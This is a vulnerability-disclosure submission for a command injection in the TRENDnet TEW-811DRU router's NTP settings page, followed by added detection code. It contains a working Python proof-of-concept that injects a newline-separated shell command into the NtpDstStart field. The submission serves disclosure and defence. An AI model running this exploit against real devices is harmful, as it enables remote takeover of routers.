Submit #76135: Command injection vulnerability in TRENDnet router TEW-811DRU

Title: Command injection vulnerability in TRENDnet router TEW-811DRU
Description:

# Command injection in TRENDnet router

## Overview of the Vulnerability

A command injection vulnerability exists in the TRENDnet router TEW-811DRU (latest firmware version: 1.0.10.0). For device information, please refer to https://www.trendnet.com/support/support-detail.asp?prod=100_TEW-811DRU. The vulnerability allows a malicious attacker authenticated on the web to execute commands on the device remotely by crafting a request, enabling the attacker to gain the highest privilege on the system and take over the device. The device uses HTTP basic authentication, which leaks passwords easily from the HTTP flow, so this vulnerability can be exploited easily.

## Steps to Reproduce

I have put the PoC code in the next section. Configure several parameters and execute it, and you will see a ping echo output from the target device. The parameters are as below:

1. username and password: used to visit the device's web interface (located on the device nameplate).
2. device_web_ip: web IP address of the target device.
3. ping_target: usually configured as the local host. The device will send a ping echo to this host. You can open Wireshark to monitor the ICMP flow.

After executing the PoC, you will see a ping echo from the device to the local host.

## Proof of Concept

Save the python3 code below as POC and execute it.
```python
import requests,socket
import re
import time
from urllib.parse import urlencode

username = 'admin'
password = 'ZYWN7T47'
device_web_ip = '192.168.10.1'
ping_target_ip = '192.168.10.102'

request = {'HEAD': {'Host': '{}'.format(device_web_ip),
                    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
                    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
                    'Accept-Language': 'en-US,en;q=0.5',
                    'Accept-Encoding': 'gzip, deflate',
                    'Content-Type': 'application/x-www-form-urlencoded',
                    'Content-Length': '555',
                    'Origin': 'http://x.x.x.x:8081',
                    #'Authorization': 'Basic YWRtaW46WllXTjdUNDc=',
                    'Connection': 'keep-alive',
                    'Referer': 'http://x.x.x.x:8081/adm/time.asp',
                    'Cookie': 'expandable=5c',
                    'Upgrade-Insecure-Requests': '1'},
           'PARAM': {'token': 'fW092VEZZPulJJfC1WkY',
                     'DSTenable': 'on',
                     'NtpDstEnable': 1,
                     'NtpDstOffset': -7200,
                     'NtpDstStart': 'abcd\nping -c 1 {}\n'.format(ping_target_ip),
                     'tz_daylight_start_day_select': 1,
                     'tz_daylight_start_time_select': 2,
                     'NtpDstEnd': 100102,
                     'tz_daylight_end_month_select': 384968387,
                     'tz_daylight_end_day_select': 1,
                     'tz_daylight_end_time_select': 2,
                     'enableNTP': 1,
                     'ntp_server': 1,
                     'NTPServerIP': 'pool.ntp.org',
                     'time_zone': 'UCT_-11',
                     'timer_interval': 16776915,
                     'manual_year_select': 2012,
                     'manual_month_select': 'abcd',
                     'manual_day_select': 'abcd',
                     'manual_min_select': -38,
                     'manual_sec_select': "abcd",
                     'timeTag': 'dummy',
                     'range.func': '/.../.../.../.../.../.../.../.../.../.../',
                     'DNSServerGuest': ''},
           'ATTR': {'URL': 'http://{}/setNTP.cgi'.format(device_web_ip),
                    'METHOD': 'POST',
                    'VERSION': 'HTTP/1.1'}
           }

headers = request['HEAD']
params = request['PARAM']
method = request['ATTR']['METHOD']
url = request['ATTR']['URL']

login_header = {'Host': 'x.x.x.x:8081',
                'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
                'Accept': '*/*',
                'Accept-Language': 'en-US,en;q=0.5',
                'Accept-Encoding': 'gzip, deflate',
                'Connection': 'keep-alive',
                'Referer': 'http://x.x.x.x:8081/login.asp',
                'Cookie': 'expandable=4c'}
login = 'http://{}/login.cgi?langSelection=EN'.format(device_web_ip)
probe = 'http://{}/wizard/wizard.asp'.format(device_web_ip)

loop = 3
r = None
while loop>0:
    try:
        loop -= 1
        r = requests.get(url=login,headers=login_header,auth=(username,password),timeout=5)
        if r.status_code != 200:
            continue
        r = requests.get(url=probe,headers=headers,auth=(username,password),timeout=5)
        pat = r'name="token" value="(.*?)"'
        token_value = re.findall(pat,r.text)
        if len(token_value)>0:
            params['token'] = token_value[0]
            print('new_token:{}'.format(token_value[0]))
            break
    except Exception as e:
        time.sleep((3-loop)*3)
        print('error:{}'.format(e))

try:
    r = requests.request(method=method,url=url,headers=headers,auth=(username,password),data=urlencode(params),verify=False,timeout=5)
except:
    pass
```
User: leetsun (UID 39457)
Submission: 01/25/2023 04:16 (3 years ago)
Moderation: 02/02/2023 09:04 (8 days later)
Status: Accepted
VulDB entry: 220018 [TRENDnet TEW-811DRU 1.0.10.0 Web Interface command injection]
Points: 17
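
For defenders, the request shape in the PoC above (a POST to `/setNTP.cgi` whose `NtpDstStart` field carries newline-separated text) can be checked for in HTTP traffic captured in front of the device. The following is an added detection example, not part of the submission or of any vendor code; the function name, the allowlist and the sample request bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Assumption: legitimate time/NTP settings are short tokens made of letters,
# digits and a few punctuation marks. Anything else is reported.
SAFE_VALUE = re.compile(r"[A-Za-z0-9._:/+-]*")
WATCHED_PATHS = {"/setNTP.cgi"}  # endpoint named in the submission

# Constructed sample bodies (not captured traffic).
BENIGN = ("token=abc123&DSTenable=on&NtpDstEnable=1&NtpDstOffset=-7200"
          "&NtpDstStart=030102&NtpDstEnd=100102"
          "&NTPServerIP=pool.ntp.org&time_zone=UCT_-11")
INJECTED = ("token=abc123&NtpDstEnable=1"
            "&NtpDstStart=abcd%0Aping+-c+1+192.0.2.10%0A&NtpDstEnd=100102")


def suspicious_params(method, url, body):
    """Return [(param, reason)] for form fields in a POST to a watched path
    that carry control characters or characters outside the allowlist."""
    if method.upper() != "POST" or urlsplit(url).path not in WATCHED_PATHS:
        return []
    findings = []
    # parse_qsl percent-decodes, so %0A and a literal newline look the same.
    for name, value in parse_qsl(body, keep_blank_values=True):
        if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in value):
            findings.append((name, "control character"))
        elif not SAFE_VALUE.fullmatch(value):
            findings.append((name, "character outside allowlist"))
    return findings


if __name__ == "__main__":
    target = "http://192.168.10.1/setNTP.cgi"
    for label, body in (("benign", BENIGN), ("injected", INJECTED)):
        print(label, suspicious_params("POST", target, body))
```

Because the device's web interface is plain HTTP, the request body is visible to a passive sensor or reverse proxy, which is where a check like this would run.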
